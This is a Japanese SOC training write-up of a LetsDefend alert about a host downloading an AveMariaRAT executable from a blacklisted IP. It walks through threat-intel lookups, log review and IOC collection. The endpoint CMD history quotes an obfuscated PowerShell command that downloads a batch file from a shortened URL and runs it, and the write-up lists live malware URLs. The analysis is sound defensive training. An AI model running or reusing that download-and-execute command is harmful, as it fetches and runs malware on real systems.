LetsDefend level 1 alert SOC112 - Traffic to Blacklisted IP event-id 43
Details
EventID: 43
Event Time: Jan. 31, 2021, 11:02 a.m.
Rule: SOC112 - Traffic to Blacklisted IP
Level: Security Analyst
Source Address 172.16.17.21
Source Hostname Jack
Destination Address 193.239.147.32
Username jack2021
Request URL http[:]//193.239.147.32/OBBBOP.exe
User Agent Mozilla/5.0 (Windows NT 10.0; Microsoft Windows 10.0.15063; en-US) PowerShell/6.0.0
Device Action Allowed
playbook
Search Log
まず、193.239.147.32を調査する。
193.239.147.32
VirusTotal 5/90: https://www.virustotal.com/gui/ip-address/193.239.147.32
ip-sc: https://ip-sc.net/ja/r/193.239.147.32
少し怪しいIPのようだ。AbuseIPDBにはレビューが無いIPであった。
では、このIPに関するアクセスログはどうだろうか。
Log search 193.239.147.32
| # | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
|---|---|---|---|---|---|---|
| 336 | Jan, 31, 2021, 11:02 AM | Firewall | 172.16.17.21 | 23112 | 193.239.147.32 | 80 |
| 337 | Jan, 31, 2021, 11:02 AM | Proxy | 172.16.17.21 | 23112 | 193.239.147.32 | 80 |
337
URL: http://193.239.147.32/OBBBOP.exe Request Method: GET
アラートに関するアクセスのみ
Analyze URL Address
今回アラートの原因となったアクセスを読み解いていく
http[:]//193.239.147.32/OBBBOP.exe
VirusTotal 7/93: https://www.virustotal.com/gui/url/2e84d48d9dbdc2c3c975c75d55ef988aca87868b38a7693f1472da0f5d58610c
URLhaus: https://urlhaus.abuse.ch/url/985031/
まず、URLがURLhausに見つかった。この結果を見るとAveMariaRAT。
- AveMariaRAT
Ave Maria Malware Analysis, Overview by ANY.RUN
Ave Maria (Malware Family)
リモートアクセス型のトロイの木馬、infostealer、およびキーロガーであって、リモートコントロールするとのこと。
このダウンロードOBBOP.exeはどんなものなのか
OBBOP.exe
VirusTotal 58/70: https://www.virustotal.com/gui/file/8dcbe6a1627356b6707223af14e34eaf6b9fde0c9781707b2fb6de4c9b12a742/detection/f-8dcbe6a
ANYRUN: https://app.any.run/tasks/63c3ef83-880e-42c2-b32c-4fe53bf8da57/
ANYRUNで見ると、firefoxに関するデータを抜き取っていそうな動作がある。
Answer: Malicious
Has Anyone Accessed IP/URL/Domain?
193.239.147.32にアクセスし、OBBBOP.exeをダウンロードしたようなので
Answer: Accessed
Containment
Endpointのログではどのようになっているか。
Endpoint - Jack(172.16.17.21)
Browser History
31.01.2021 09:21: https://stackoverflow.com/questions/14551194/how-are-parameters-sent-in-an-http-post-request?rq=1
CMD History
31.01.2021 10:15: cmd /c po^wershe^ll -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).(Down+loadFile).Invoke(http://rebrand.ly/WdBPApoMACRO,a.bat) 31.01.2021 10:16: powershell -w 1 ./a.bat 31.01.2021 10:17: C:/Windows/system32/cmd.exe /c C:/Users/admin/Documents/a.bat
Network Connections
31.01.2021 09:21: 151.101.193.69 31.01.2021 09:22: 151.101.193.69 31.01.2021 09:23: 151.101.193.69 31.01.2021 11:01: 52.206.27.160 31.01.2021 11:02: 193.239.147.32
これらの記録だけだとhttp[:]//193.239.147.32/OBBBOP.exeへのアクセスの経緯は見えてこない。
また、Process HistoryにOBBBOP.exeが無いのでまだ実行していないのか。ログがの残らなかったのか。
Add Artifacts
| Value | Type | Comment |
|---|---|---|
| 193.239.147.32 | IP Address | C2 server |
| http[:]//193.239.147.32/OBBBOP.exe | URL Address | the server distributing malware |
| 06f4d22f42e1d2406d5dd25c69aa92ac | MD5 Hash | OOOBBBOP.exe - AveMariaRAT |
End
有名なマルウェアの動きに触れられるのが良い。
